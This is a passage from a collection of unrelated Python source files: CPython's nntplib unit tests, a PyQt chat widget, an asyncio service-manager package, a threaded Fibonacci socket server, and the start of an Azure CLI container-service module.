(Moderated)", }) resp, groups = self.server.descriptions("comp.lang.pythonx") self.assertEqual(groups, {}) def test_group(self): resp, count, first, last, group = self.server.group("fr.comp.lang.python") self.assertTrue(resp.startswith("211 "), resp) self.assertEqual(first, 761) self.assertEqual(last, 1265) self.assertEqual(count, 486) self.assertEqual(group, "fr.comp.lang.python") with self.assertRaises(nntplib.NNTPTemporaryError) as cm: self.server.group("comp.lang.python.devel") exc = cm.exception self.assertTrue(exc.response.startswith("411 No such group"), exc.response) def test_newnews(self): # NEWNEWS comp.lang.python [20]100913 082004 dt = datetime.datetime(2010, 9, 13, 8, 20, 4) resp, ids = self.server.newnews("comp.lang.python", dt) expected = ( "230 list of newsarticles (NNTP v{0}) " "created after Mon Sep 13 08:20:04 2010 follows" ).format(self.nntp_version) self.assertEqual(resp, expected) self.assertEqual(ids, [ "<a4929a40-6328-491a-aaaf-cb79ed7309a2@q2g2000vbk.googlegroups.com>", "<f30c0419-f549-4218-848f-d7d0131da931@y3g2000vbm.googlegroups.com>", ]) # NEWNEWS fr.comp.lang.python [20]100913 082004 dt = datetime.datetime(2010, 9, 13, 8, 20, 4) resp, ids = self.server.newnews("fr.comp.lang.python", dt) self.assertEqual(resp, "230 An empty list of newsarticles follows") self.assertEqual(ids, []) def _check_article_body(self, lines): self.assertEqual(len(lines), 4) self.assertEqual(lines[-1].decode('utf-8'), "-- Signed by André.") self.assertEqual(lines[-2], b"") self.assertEqual(lines[-3], b".Here is a dot-starting line.") self.assertEqual(lines[-4], b"This is just a test article.") def _check_article_head(self, lines): self.assertEqual(len(lines), 4) self.assertEqual(lines[0], b'From: "Demo User" <nobody@example.net>') self.assertEqual(lines[3], b"Message-ID: <i.am.an.article.you.will.want@example.com>") def _check_article_data(self, lines): self.assertEqual(len(lines), 9) self._check_article_head(lines[:4]) self._check_article_body(lines[-4:]) self.assertEqual(lines[4], b"") def test_article(self): # ARTICLE resp, info = self.server.article() self.assertEqual(resp, "220 3000237 <45223423@example.com>") art_num, message_id, lines = info self.assertEqual(art_num, 3000237) self.assertEqual(message_id, "<45223423@example.com>") self._check_article_data(lines) # ARTICLE num resp, info = self.server.article(3000234) self.assertEqual(resp, "220 3000234 <45223423@example.com>") art_num, message_id, lines = info self.assertEqual(art_num, 3000234) self.assertEqual(message_id, "<45223423@example.com>") self._check_article_data(lines) # ARTICLE id resp, info = self.server.article("<45223423@example.com>") self.assertEqual(resp, "220 0 <45223423@example.com>") art_num, message_id, lines = info self.assertEqual(art_num, 0) self.assertEqual(message_id, "<45223423@example.com>") self._check_article_data(lines) # Non-existent id with self.assertRaises(nntplib.NNTPTemporaryError) as cm: self.server.article("<non-existent@example.com>") self.assertEqual(cm.exception.response, "430 No Such Article Found") def test_article_file(self): # With a "file" argument f = io.BytesIO() resp, info = self.server.article(file=f) self.assertEqual(resp, "220 3000237 <45223423@example.com>") art_num, message_id, lines = info self.assertEqual(art_num, 3000237) self.assertEqual(message_id, "<45223423@example.com>") self.assertEqual(lines, []) data = f.getvalue() self.assertTrue(data.startswith( b'From: "Demo User" <nobody@example.net>\r\n' b'Subject: I am just a test article\r\n' ), ascii(data)) 
self.assertTrue(data.endswith( b'This is just a test article.\r\n' b'.Here is a dot-starting line.\r\n' b'\r\n' b'-- Signed by Andr\xc3\xa9.\r\n' ), ascii(data)) def test_head(self): # HEAD resp, info = self.server.head() self.assertEqual(resp, "221 3000237 <45223423@example.com>") art_num, message_id, lines = info self.assertEqual(art_num, 3000237) self.assertEqual(message_id, "<45223423@example.com>") self._check_article_head(lines) # HEAD num resp, info = self.server.head(3000234) self.assertEqual(resp, "221 3000234 <45223423@example.com>") art_num, message_id, lines = info self.assertEqual(art_num, 3000234) self.assertEqual(message_id, "<45223423@example.com>") self._check_article_head(lines) # HEAD id resp, info = self.server.head("<45223423@example.com>") self.assertEqual(resp, "221 0 <45223423@example.com>") art_num, message_id, lines = info self.assertEqual(art_num, 0) self.assertEqual(message_id, "<45223423@example.com>") self._check_article_head(lines) # Non-existent id with self.assertRaises(nntplib.NNTPTemporaryError) as cm: self.server.head("<non-existent@example.com>") self.assertEqual(cm.exception.response, "430 No Such Article Found") def test_head_file(self): f = io.BytesIO() resp, info = self.server.head(file=f) self.assertEqual(resp, "221 3000237 <45223423@example.com>") art_num, message_id, lines = info self.assertEqual(art_num, 3000237) self.assertEqual(message_id, "<45223423@example.com>") self.assertEqual(lines, []) data = f.getvalue() self.assertTrue(data.startswith( b'From: "Demo User" <nobody@example.net>\r\n' b'Subject: I am just a test article\r\n' ), ascii(data)) self.assertFalse(data.endswith( b'This is just a test article.\r\n' b'.Here is a dot-starting line.\r\n' b'\r\n' b'-- Signed by Andr\xc3\xa9.\r\n' ), ascii(data)) def test_body(self): # BODY resp, info = self.server.body() self.assertEqual(resp, "222 3000237 <45223423@example.com>") art_num, message_id, lines = info self.assertEqual(art_num, 3000237) self.assertEqual(message_id, "<45223423@example.com>") self._check_article_body(lines) # BODY num resp, info = self.server.body(3000234) self.assertEqual(resp, "222 3000234 <45223423@example.com>") art_num, message_id, lines = info self.assertEqual(art_num, 3000234) self.assertEqual(message_id, "<45223423@example.com>") self._check_article_body(lines) # BODY id resp, info = self.server.body("<45223423@example.com>") self.assertEqual(resp, "222 0 <45223423@example.com>") art_num, message_id, lines = info self.assertEqual(art_num, 0) self.assertEqual(message_id, "<45223423@example.com>") self._check_article_body(lines) # Non-existent id with self.assertRaises(nntplib.NNTPTemporaryError) as cm: self.server.body("<non-existent@example.com>") self.assertEqual(cm.exception.response, "430 No Such Article Found") def test_body_file(self): f = io.BytesIO() resp, info = self.server.body(file=f) self.assertEqual(resp, "222 3000237 <45223423@example.com>") art_num, message_id, lines = info self.assertEqual(art_num, 3000237) self.assertEqual(message_id, "<45223423@example.com>") self.assertEqual(lines, []) data = f.getvalue() self.assertFalse(data.startswith( b'From: "Demo User" <nobody@example.net>\r\n' b'Subject: I am just a test article\r\n' ), ascii(data)) self.assertTrue(data.endswith( b'This is just a test article.\r\n' b'.Here is a dot-starting line.\r\n' b'\r\n' b'-- Signed by Andr\xc3\xa9.\r\n' ), ascii(data)) def check_over_xover_resp(self, resp, overviews): self.assertTrue(resp.startswith("224 "), resp) self.assertEqual(len(overviews), 3) art_num, over = 
overviews[0] self.assertEqual(art_num, 57) self.assertEqual(over, { "from": "Doug Hellmann <doug.hellmann-Re5JQEeQqe8AvxtiuMwx3w@public.gmane.org>", "subject": "Re: ANN: New Plone book with strong Python (and Zope) themes throughout", "date": "Sat, 19 Jun 2010 18:04:08 -0400", "message-id": "<4FD05F05-F98B-44DC-8111-C6009C925F0C@gmail.com>", "references": "<hvalf7$ort$1@dough.gmane.org>", ":bytes": "7103", ":lines": "16", "xref": "news.gmane.org gmane.comp.python.authors:57" }) art_num, over = overviews[1] self.assertEqual(over["xref"], None) art_num, over = overviews[2] self.assertEqual(over["subject"], "Re: Message d'erreur incompréhensible (par moi)") def test_xover(self): resp, overviews = self.server.xover(57, 59) self.check_over_xover_resp(resp, overviews) def test_over(self): # In NNTP "v1", this will fallback on XOVER resp, overviews = self.server.over((57, 59)) self.check_over_xover_resp(resp, overviews) sample_post = ( b'From: "Demo User" <nobody@example.net>\r\n' b'Subject: I am just a test article\r\n' b'Content-Type: text/plain; charset=UTF-8; format=flowed\r\n' b'Message-ID: <i.am.an.article.you.will.want@example.com>\r\n' b'\r\n' b'This is just a test article.\r\n' b'.Here is a dot-starting line.\r\n' b'\r\n' b'-- Signed by Andr\xc3\xa9.\r\n' ) def _check_posted_body(self): # Check the raw body as received by the server lines = self.handler.posted_body # One additional line for the "." terminator self.assertEqual(len(lines), 10) self.assertEqual(lines[-1], b'.\r\n') self.assertEqual(lines[-2], b'-- Signed by Andr\xc3\xa9.\r\n') self.assertEqual(lines[-3], b'\r\n') self.assertEqual(lines[-4], b'..Here is a dot-starting line.\r\n') self.assertEqual(lines[0], b'From: "Demo User" <nobody@example.net>\r\n') def _check_post_ihave_sub(self, func, *args, file_factory): # First the prepared post with CRLF endings post = self.sample_post func_args = args + (file_factory(post),) self.handler.posted_body = None resp = func(*func_args) self._check_posted_body() # Then the same post with "normal" line endings - they should be # converted by NNTP.post and NNTP.ihave. 
post = self.sample_post.replace(b"\r\n", b"\n") func_args = args + (file_factory(post),) self.handler.posted_body = None resp = func(*func_args) self._check_posted_body() return resp def check_post_ihave(self, func, success_resp, *args): # With a bytes object resp = self._check_post_ihave_sub(func, *args, file_factory=bytes) self.assertEqual(resp, success_resp) # With a bytearray object resp = self._check_post_ihave_sub(func, *args, file_factory=bytearray) self.assertEqual(resp, success_resp) # With a file object resp = self._check_post_ihave_sub(func, *args, file_factory=io.BytesIO) self.assertEqual(resp, success_resp) # With an iterable of terminated lines def iterlines(b): return iter(b.splitlines(keepends=True)) resp = self._check_post_ihave_sub(func, *args, file_factory=iterlines) self.assertEqual(resp, success_resp) # With an iterable of non-terminated lines def iterlines(b): return iter(b.splitlines(keepends=False)) resp = self._check_post_ihave_sub(func, *args, file_factory=iterlines) self.assertEqual(resp, success_resp) def test_post(self): self.check_post_ihave(self.server.post, "240 Article received OK") self.handler.allow_posting = False with self.assertRaises(nntplib.NNTPTemporaryError) as cm: self.server.post(self.sample_post) self.assertEqual(cm.exception.response, "440 Posting not permitted") def test_ihave(self): self.check_post_ihave(self.server.ihave, "235 Article transferred OK", "<i.am.an.article.you.will.want@example.com>") with self.assertRaises(nntplib.NNTPTemporaryError) as cm: self.server.ihave("<another.message.id>", self.sample_post) self.assertEqual(cm.exception.response, "435 Article not wanted") def test_too_long_lines(self): dt = datetime.datetime(2010, 1, 1, 9, 0, 0) self.assertRaises(nntplib.NNTPDataError, self.server.newnews, "comp.lang.python", dt) class NNTPv1Tests(NNTPv1v2TestsMixin, MockedNNTPTestsMixin, unittest.TestCase): """Tests an NNTP v1 server (no capabilities).""" nntp_version = 1 handler_class = NNTPv1Handler def test_caps(self): caps = self.server.getcapabilities() self.assertEqual(caps, {}) self.assertEqual(self.server.nntp_version, 1) self.assertEqual(self.server.nntp_implementation, None) class NNTPv2Tests(NNTPv1v2TestsMixin, MockedNNTPTestsMixin, unittest.TestCase): """Tests an NNTP v2 server (with capabilities).""" nntp_version = 2 handler_class = NNTPv2Handler def test_caps(self): caps = self.server.getcapabilities() self.assertEqual(caps, { 'VERSION': ['2', '3'], 'IMPLEMENTATION': ['INN', '2.5.1'], 'AUTHINFO': ['USER'], 'HDR': [], 'LIST': ['ACTIVE', 'ACTIVE.TIMES', 'DISTRIB.PATS', 'HEADERS', 'NEWSGROUPS', 'OVERVIEW.FMT'], 'OVER': [], 'POST': [], 'READER': [], }) self.assertEqual(self.server.nntp_version, 3) self.assertEqual(self.server.nntp_implementation, 'INN 2.5.1') class CapsAfterLoginNNTPv2Tests(MockedNNTPTestsMixin, unittest.TestCase): """Tests a probably NNTP v2 server with capabilities only after login.""" nntp_version = 2 handler_class = CapsAfterLoginNNTPv2Handler def test_caps_only_after_login(self): self.assertEqual(self.server._caps, {}) self.server.login('testuser', 'testpw') self.assertIn('VERSION', self.server._caps) class SendReaderNNTPv2Tests(MockedNNTPWithReaderModeMixin, unittest.TestCase): """Same tests as for v2 but we tell NTTP to send MODE READER to a server that isn't in READER mode by default.""" nntp_version = 2 handler_class = ModeSwitchingNNTPv2Handler def test_we_are_in_reader_mode_after_connect(self): self.assertIn('READER', self.server._caps) class MiscTests(unittest.TestCase): def 
test_decode_header(self): def gives(a, b): self.assertEqual(nntplib.decode_header(a), b) gives("" , "") gives("a plain header", "a plain header") gives(" with extra spaces ", " with extra spaces ") gives("=?ISO-8859-15?Q?D=E9buter_en_Python?=", "Débuter en Python") gives("=?utf-8?q?Re=3A_=5Bsqlite=5D_probl=C3=A8me_avec_ORDER_BY_sur_des_cha?=" " =?utf-8?q?=C3=AEnes_de_caract=C3=A8res_accentu=C3=A9es?=", "Re: [sqlite] problème avec ORDER BY sur des chaînes de caractères accentuées") gives("Re: =?UTF-8?B?cHJvYmzDqG1lIGRlIG1hdHJpY2U=?=", "Re: problème de matrice") # A natively utf-8 header (found in the real world!) gives("Re: Message d'erreur incompréhensible (par moi)", "Re: Message d'erreur incompréhensible (par moi)") def test_parse_overview_fmt(self): # The minimal (default) response lines = ["Subject:", "From:", "Date:", "Message-ID:", "References:", ":bytes", ":lines"] self.assertEqual(nntplib._parse_overview_fmt(lines), ["subject", "from", "date", "message-id", "references", ":bytes", ":lines"]) # The minimal response using alternative names lines = ["Subject:", "From:", "Date:", "Message-ID:", "References:", "Bytes:", "Lines:"] self.assertEqual(nntplib._parse_overview_fmt(lines), ["subject", "from", "date", "message-id", "references", ":bytes", ":lines"]) # Variations in casing lines = ["subject:", "FROM:", "DaTe:", "message-ID:", "References:", "BYTES:", "Lines:"] self.assertEqual(nntplib._parse_overview_fmt(lines), ["subject", "from", "date", "message-id", "references", ":bytes", ":lines"]) # First example from RFC 3977 lines = ["Subject:", "From:", "Date:", "Message-ID:", "References:", ":bytes", ":lines", "Xref:full", "Distribution:full"] self.assertEqual(nntplib._parse_overview_fmt(lines), ["subject", "from", "date", "message-id", "references", ":bytes", ":lines", "xref", "distribution"]) # Second example from RFC 3977 lines = ["Subject:", "From:", "Date:", "Message-ID:", "References:", "Bytes:", "Lines:", "Xref:FULL", "Distribution:FULL"] self.assertEqual(nntplib._parse_overview_fmt(lines), ["subject", "from", "date", "message-id", "references", ":bytes", ":lines", "xref", "distribution"]) # A classic response from INN lines = ["Subject:", "From:", "Date:", "Message-ID:", "References:", "Bytes:", "Lines:", "Xref:full"] self.assertEqual(nntplib._parse_overview_fmt(lines), ["subject", "from", "date", "message-id", "references", ":bytes", ":lines", "xref"]) def test_parse_overview(self): fmt = nntplib._DEFAULT_OVERVIEW_FMT + ["xref"] # First example from RFC 3977 lines = [ '3000234\tI am just a test article\t"Demo User" ' '<nobody@example.com>\t6 Oct 1998 04:38:40 -0500\t' '<45223423@example.com>\t<45454@example.net>\t1234\t' '17\tXref: news.example.com misc.test:3000363', ] overview = nntplib._parse_overview(lines, fmt) (art_num, fields), = overview self.assertEqual(art_num, 3000234) self.assertEqual(fields, { 'subject': 'I am just a test article', 'from': '"Demo User" <nobody@example.com>', 'date': '6 Oct 1998 04:38:40 -0500', 'message-id': '<45223423@example.com>', 'references': '<45454@example.net>', ':bytes': '1234', ':lines': '17', 'xref': 'news.example.com misc.test:3000363', }) # Second example; here the "Xref" field is totally absent (including # the header name) and comes out as None lines = [ '3000234\tI am just a test article\t"Demo User" ' '<nobody@example.com>\t6 Oct 1998 04:38:40 -0500\t' '<45223423@example.com>\t<45454@example.net>\t1234\t' '17\t\t', ] overview = nntplib._parse_overview(lines, fmt) (art_num, fields), = overview self.assertEqual(fields['xref'], None) 
# Third example; the "Xref" is an empty string, while "references" # is a single space. lines = [ '3000234\tI am just a test article\t"Demo User" ' '<nobody@example.com>\t6 Oct 1998 04:38:40 -0500\t' '<45223423@example.com>\t \t1234\t' '17\tXref: \t', ] overview = nntplib._parse_overview(lines, fmt) (art_num, fields), = overview self.assertEqual(fields['references'], ' ') self.assertEqual(fields['xref'], '') def test_parse_datetime(self): def gives(a, b, *c): self.assertEqual(nntplib._parse_datetime(a, b), datetime.datetime(*c)) # Output of DATE command gives("19990623135624", None, 1999, 6, 23, 13, 56, 24) # Variations gives("19990623", "135624", 1999, 6, 23, 13, 56, 24) gives("990623", "135624", 1999, 6, 23, 13, 56, 24) gives("090623", "135624", 2009, 6, 23, 13, 56, 24) def test_unparse_datetime(self): # Test non-legacy mode # 1) with a datetime def gives(y, M, d, h, m, s, date_str, time_str): dt = datetime.datetime(y, M, d, h, m, s) self.assertEqual(nntplib._unparse_datetime(dt), (date_str, time_str)) self.assertEqual(nntplib._unparse_datetime(dt, False), (date_str, time_str)) gives(1999, 6, 23, 13, 56, 24, "19990623", "135624") gives(2000, 6, 23, 13, 56, 24, "20000623", "135624") gives(2010, 6, 5, 1, 2, 3, "20100605", "010203") # 2) with a date def gives(y, M, d, date_str, time_str): dt = datetime.date(y, M, d) self.assertEqual(nntplib._unparse_datetime(dt), (date_str, time_str)) self.assertEqual(nntplib._unparse_datetime(dt, False), (date_str, time_str)) gives(1999, 6, 23, "19990623", "000000") gives(2000, 6, 23, "20000623", "000000") gives(2010, 6, 5, "20100605", "000000") def test_unparse_datetime_legacy(self): # Test legacy mode (RFC 977) # 1) with a datetime def gives(y, M, d, h, m, s, date_str, time_str): dt = datetime.datetime(y, M, d, h, m, s) self.assertEqual(nntplib._unparse_datetime(dt, True), (date_str, time_str)) gives(1999, 6, 23, 13, 56, 24, "990623", "135624") gives(2000, 6, 23, 13, 56, 24, "000623", "135624") gives(2010, 6, 5, 1, 2, 3, "100605", "010203") # 2) with a date def gives(y, M, d, date_str, time_str): dt = datetime.date(y, M, d) self.assertEqual(nntplib._unparse_datetime(dt, True), (date_str, time_str)) gives(1999, 6, 23, "990623", "000000") gives(2000, 6, 23, "000623", "000000") gives(2010, 6, 5, "100605", "000000") @unittest.skipUnless(ssl, 'requires SSL support') def test_ssl_support(self): self.assertTrue(hasattr(nntplib, 'NNTP_SSL')) class PublicAPITests(unittest.TestCase): """Ensures that the correct values are exposed in the public API.""" def test_module_all_attribute(self): self.assertTrue(hasattr(nntplib, '__all__')) target_api = ['NNTP', 'NNTPError', 'NNTPReplyError', 'NNTPTemporaryError', 'NNTPPermanentError', 'NNTPProtocolError', 'NNTPDataError', 'decode_header'] if ssl is not None: target_api.append('NNTP_SSL') self.assertEqual(set(nntplib.__all__), set(target_api)) class MockSocketTests(unittest.TestCase): """Tests involving a mock socket object Used where the _NNTPServerIO file object is not enough.""" nntp_class = nntplib.NNTP def check_constructor_error_conditions( self, handler_class, expected_error_type, expected_error_msg, login=None, password=None): class mock_socket_module: def create_connection(address, timeout): return MockSocket() class MockSocket: def close(self): nonlocal socket_closed socket_closed = True def makefile(socket, mode): handler = handler_class() _, file = make_mock_file(handler) files.append(file) return file socket_closed = False files = [] with patch('nntplib.socket', mock_socket_module), \ 
self.assertRaisesRegex(expected_error_type, expected_error_msg): self.nntp_class('dummy', user=login, password=password) self.assertTrue(socket_closed) for f in files: self.assertTrue(f.closed) def test_bad_welcome(self): #Test a bad welcome message class Handler(NNTPv1Handler): welcome = 'Bad Welcome' self.check_constructor_error_conditions( Handler, nntplib.NNTPProtocolError, Handler.welcome) def test_service_temporarily_unavailable(self): #Test service temporarily unavailable class Handler(NNTPv1Handler): welcome = '400 Service temporarily unavailable' self.check_constructor_error_conditions( Handler, nntplib.NNTPTemporaryError, Handler.welcome) def test_service_permanently_unavailable(self): #Test service permanently unavailable class Handler(NNTPv1Handler): welcome = '502 Service permanently unavailable' self.check_constructor_error_conditions( Handler, nntplib.NNTPPermanentError, Handler.welcome) def test_bad_capabilities(self): #Test a bad capabilities response class Handler(NNTPv1Handler): def handle_CAPABILITIES(self): self.push_lit(capabilities_response) capabilities_response = '201 bad capability' self.check_constructor_error_conditions( Handler, nntplib.NNTPReplyError, capabilities_response) def test_login_aborted(self): #Test a bad authinfo response login = 't@e.com' password = 'python' class Handler(NNTPv1Handler): def handle_AUTHINFO(self, *args): self.push_lit(authinfo_response) authinfo_response = '503 Mechanism not recognized' self.check_constructor_error_conditions( Handler, nntplib.NNTPPermanentError, authinfo_response, login, password) class bypass_context: """Bypass encryption and actual SSL module""" def wrap_socket(sock, **args): return sock @unittest.skipUnless(ssl, 'requires SSL support') class MockSslTests(MockSocketTests): @staticmethod def nntp_class(*pos, **kw): return nntplib.NNTP_SSL(*pos, ssl_context=bypass_context, **kw) class LocalServerTests(unittest.TestCase): def setUp(self): sock = socket.socket() port = support.bind_port(sock) sock.listen() self.background = threading.Thread( target=self.run_server, args=(sock,)) self.background.start() self.addCleanup(self.background.join) self.nntp = NNTP(support.HOST, port, usenetrc=False).__enter__() self.addCleanup(self.nntp.__exit__, None, None, None) def run_server(self, sock): # Could be generalized to handle more commands in separate methods with sock: [client, _] = sock.accept() with contextlib.ExitStack() as cleanup: cleanup.enter_context(client) reader = cleanup.enter_context(client.makefile('rb')) client.sendall(b'200 Server ready\r\n') while True: cmd = reader.readline() if cmd == b'CAPABILITIES\r\n': client.sendall( b'101 Capability list:\r\n' b'VERSION 2\r\n' b'STARTTLS\r\n' b'.\r\n' ) elif cmd == b'STARTTLS\r\n': reader.close() client.sendall(b'382 Begin TLS negotiation now\r\n') context = ssl.SSLContext() context.load_cert_chain(certfile) client = context.wrap_socket( client, server_side=True) cleanup.enter_context(client) reader = cleanup.enter_context(client.makefile('rb')) elif cmd == b'QUIT\r\n': client.sendall(b'205 Bye!\r\n') break else: raise ValueError('Unexpected command {!r}'.format(cmd)) @unittest.skipUnless(ssl, 'requires SSL support') def test_starttls(self): file = self.nntp.file sock = self.nntp.sock self.nntp.starttls() # Check that the socket and internal pseudo-file really were # changed. 
self.assertNotEqual(file, self.nntp.file) self.assertNotEqual(sock, self.nntp.sock) # Check that the new socket really is an SSL one self.assertIsInstance(self.nntp.sock, ssl.SSLSocket) # Check that trying starttls when it's already active fails. self.assertRaises(ValueError, self.nntp.starttls) if __name__ == "__main__": unittest.main()
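# --- Illustrative sketch (added; not exercised by the test suite above) ---
# A minimal sketch of the client-side use of the helpers tested above
# (decode_header and the overview parsing behind over()). The server name and
# newsgroup are placeholders and a reachable NNTP server is assumed; the
# function is defined only and is never called by the tests.
def _example_list_recent_subjects(server='news.example.com', group='comp.lang.python'):
    import nntplib
    with nntplib.NNTP(server) as srv:
        resp, count, first, last, name = srv.group(group)
        # over() returns (article_number, fields) pairs built by _parse_overview()
        resp, overviews = srv.over((last - 9, last))
        for art_num, fields in overviews:
            print(art_num, nntplib.decode_header(fields['subject']))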
chatWidget.py
from PyQt5 import QtGui, QtWidgets, QtCore
from ..Chat.client import ChatClient
import threading


class ChatWidget(QtWidgets.QWidget):
    """Chat panel: a message list, an input box and a Send button."""

    def __init__(self, name):
        super().__init__()
        self.name = name
        self.client = None
        self.initUI()

    def initUI(self):
        self.chatMessages = QtWidgets.QListWidget()
        self.inputBox = QtWidgets.QTextEdit()
        self.inputBox.installEventFilter(self)
        self.scrollBar = QtWidgets.QScrollBar()
        self.scrollBar.setStyleSheet('background : lightgrey;')
        self.chatMessages.setVerticalScrollBar(self.scrollBar)
        # Limit the input box to roughly three lines of text.
        self.inputBox.setFixedHeight(
            int(
                self.inputBox.fontMetrics().lineSpacing() * 3
                + self.inputBox.document().documentMargin() * 2
                + self.inputBox.frameWidth() * 2 - 1
            )
        )
        self.sendButton = QtWidgets.QPushButton('Send')
        self.sendButton.clicked.connect(self.onClickSend)

        grid = QtWidgets.QGridLayout()
        grid.setSpacing(3)
        grid.addWidget(self.chatMessages, 0, 0, 1, 3)
        grid.addWidget(self.inputBox, 1, 0, 1, 1)
        grid.addWidget(self.sendButton, 1, 2)
        grid.setRowStretch(0, 1)
        grid.setColumnStretch(0, 1)
        self.setLayout(grid)
        # Input stays disabled until a client connection has been initialized.
        self.sendButton.setEnabled(False)
        self.inputBox.setEnabled(False)

    def eventFilter(self, obj, event):
        if event.type() == QtCore.QEvent.KeyPress and obj is self.inputBox:
            if event.key() == QtCore.Qt.Key_Return and self.inputBox.hasFocus():
                self.onClickSend()
                self.inputBox.setText('')
                # Consume the key press so Return does not also insert a
                # newline into the (now cleared) input box.
                return True
        return super().eventFilter(obj, event)

    def intializeClient(self, addr, port, userPassword, isHost):
        """Connect to the chat server and start listening for messages."""
        if self.client:
            self.client.quit()
        self.client = ChatClient(addr, port, isHost)
        self.client.receiveMessageTrigger.connect(self.addMessage)
        threading.Thread(target=self.client.listenForIncomingMessages, daemon=True).start()
        self.client.sendMessage(userPassword)
        self.client.sendMessage('1234joined: ' + self.name)
        self.sendButton.setEnabled(True)
        self.inputBox.setEnabled(True)

    def onClickSend(self):
        msg = self.inputBox.toPlainText()
        if not msg:
            return
        self.addMessage(self.name + ': ' + msg)
        self.client.sendMessage(self.name + ': ' + msg)

    def addMessage(self, msg):
        self.chatMessages.addItem(QtWidgets.QListWidgetItem(msg))
        self.inputBox.setText('')

    def cleanUp(self):
        if self.client:
            self.client.quit()
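# --- Illustrative usage sketch (added for clarity; not part of the original file) ---
# A minimal sketch, assuming the package imports above resolve and that a chat
# server created by the companion ChatClient/host module is already listening.
# The host, port and password values below are placeholders, not values taken
# from the original code; the function is defined only, nothing runs on import.
def _example_show_chat_widget(host='127.0.0.1', port=5000, password='secret'):
    import sys
    app = QtWidgets.QApplication(sys.argv)
    widget = ChatWidget('alice')
    widget.intializeClient(host, port, password, isHost=False)  # enables the input box and Send button
    widget.show()
    sys.exit(app.exec_())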
__init__.py
import threading

from async_services.core.exceptions import ManagerNotInitialized
from async_services.core.manager import ServiceManager

# There is only one ServiceManager at a time; it can be stopped at any point.
service_manager = None


def run_manager(block=False):
    """
    Start the manager.

    You do not need to call this function before scheduling a coroutine;
    run_coro will call it for you if the manager is not running yet.

    :param block: if True, this is a blocking call and the event loop runs in
                  the calling thread; otherwise a separate thread is spawned
                  to run the event loop.
    :return:
    """
    global service_manager
    if not service_manager:
        service_manager = ServiceManager()
        if block:
            service_manager.run()
        else:
            threading.Thread(target=service_manager.run).start()
            # Busy-wait until the manager's event loop is up and ready
            # to accept coroutines.
            while not service_manager.is_initialized:
                pass


def run_coro(coro, block=False, callback=None, timeout=None):
    """
    :param coro: coroutine to schedule
    :param block: whether to block until the coroutine finishes
    :param callback: a function which takes at least two arguments:
                     1. status: status of the coroutine
                     2. response: value returned by the coroutine
    :param timeout: seconds after which the coroutine is cancelled if it has
                    not completed
    :return: if block is True, a tuple <status, response>; otherwise a string
             <coroutine_id> that can be used to fetch the result later or to
             cancel the coroutine.
    """
    if not service_manager:
        run_manager()
    return service_manager.schedule(coro, block, callback, timeout)


def check_result(coro_id):
    """
    :param coro_id: coroutine_id returned by run_coro
    :return: a tuple <status, response>
    """
    if service_manager:
        return service_manager.check_result(coro_id)
    raise ManagerNotInitialized("Async Services Manager Not Initialized.")


def cancel_coro(coro_id):
    """
    :param coro_id: coroutine_id returned by run_coro
    :return:
    """
    if service_manager:
        return service_manager.cancel_coro(coro_id)
    raise ManagerNotInitialized("Async Services Manager Not Initialized.")


def stop_manager():
    """
    Cancel all running coroutines, close the event-loop thread and stop the
    currently running manager.

    :return:
    """
    global service_manager
    if service_manager:
        service_manager.stop()
        service_manager = None
        return
    raise ManagerNotInitialized("Async Services Manager Not Initialized.")
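# --- Illustrative usage sketch (added for clarity; not part of the original module) ---
# A minimal sketch based on the docstrings above; the coroutine, its arguments
# and the sleep before stop_manager() are illustrative assumptions, not part of
# the package. Guarded so nothing runs when the package is imported.
if __name__ == '__main__':
    import asyncio
    import time

    async def add(a, b):
        await asyncio.sleep(0.1)
        return a + b

    # Blocking call: per the docstring, returns a <status, response> tuple.
    status, result = run_coro(add(2, 3), block=True)
    print(status, result)

    # Non-blocking call with a callback; give it a moment to finish before
    # shutting the manager down.
    run_coro(add(4, 5), callback=lambda status, response: print(status, response))
    time.sleep(1)
    stop_manager()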
threaded_server.py
from socket import *
from t1 import fib  # fib() is provided by the companion t1 module
from threading import Thread
import sys

print(sys.getswitchinterval())
# sys.setswitchinterval(.000005)  # new in 3.2: how often (in seconds) the interpreter considers switching threads
# sys.setcheckinterval(1)  # old pre-3.2 knob (bytecode check interval), replaced by Antoine Pitrou's new GIL in 3.2


def fib_server(address):
    server = socket(AF_INET, SOCK_STREAM)
    server.setsockopt(SOL_SOCKET, SO_REUSEADDR, 1)
    server.bind(address)
    server.listen(5)
    while True:
        client, addr = server.accept()
        print(f"connection {addr}")
        # One thread per connection; the handler does the CPU-bound fib() work.
        Thread(target=fib_handler, args=(client, addr)).start()


def fib_handler(client, addr):
    while True:
        try:
            req = client.recv(100)
            if not req:  # empty read means the client closed the connection
                break
            num = int(req)
            result = fib(num)
            client.send(str(result).encode('ascii') + b'\n')
        except ConnectionResetError:
            break
    client.close()
    print(f'connection closed {addr}')


if __name__ == '__main__':
    fib_server(('', 25000))
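# --- Illustrative client sketch (added; not part of the original server script) ---
# A minimal sketch for exercising fib_server from another process or terminal.
# It assumes the server above is already running on port 25000 of localhost;
# the request value is a placeholder. In practice this would live in its own file.
def fib_request(n, address=('localhost', 25000)):
    from socket import socket, AF_INET, SOCK_STREAM  # local import so the sketch is self-contained
    # Open a connection, send one integer as ASCII text, read back one line.
    sock = socket(AF_INET, SOCK_STREAM)
    sock.connect(address)
    sock.send(str(n).encode('ascii'))
    reply = sock.recv(100)
    sock.close()
    return int(reply)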
custom.py
# -------------------------------------------------------------------------------------------- # Copyright (c) Microsoft Corporation. All rights reserved. # Licensed under the MIT License. See License.txt in the project root for license information. # -------------------------------------------------------------------------------------------- from __future__ import print_function import binascii import datetime import errno import json import os import os.path import platform import random import re import ssl import stat import string import subprocess import sys import tempfile import threading import time import uuid import webbrowser from six.moves.urllib.request import urlopen # pylint: disable=import-error from six.moves.urllib.error import URLError # pylint: disable=import-error import yaml import dateutil.parser from dateutil.relativedelta import relativedelta from knack.log import get_logger from knack.util import CLIError from msrestazure.azure_exceptions import CloudError import requests from azure.cli.command_modules.acs import acs_client, proxy from azure.cli.command_modules.acs._params import regions_in_preview, regions_in_prod from azure.cli.core.api import get_config_dir from azure.cli.core._profile import Profile from azure.cli.core.commands.client_factory import get_mgmt_service_client from azure.cli.core.keys import is_valid_ssh_rsa_public_key from azure.cli.core.util import in_cloud_console, shell_safe_json_parse, truncate_text, sdk_no_wait from azure.cli.core.commands import LongRunningOperation from azure.graphrbac.models import (ApplicationCreateParameters, ApplicationUpdateParameters, PasswordCredential, KeyCredential, ServicePrincipalCreateParameters, GetObjectsParameters, ResourceAccess, RequiredResourceAccess) from azure.mgmt.containerservice.models import ContainerServiceLinuxProfile from 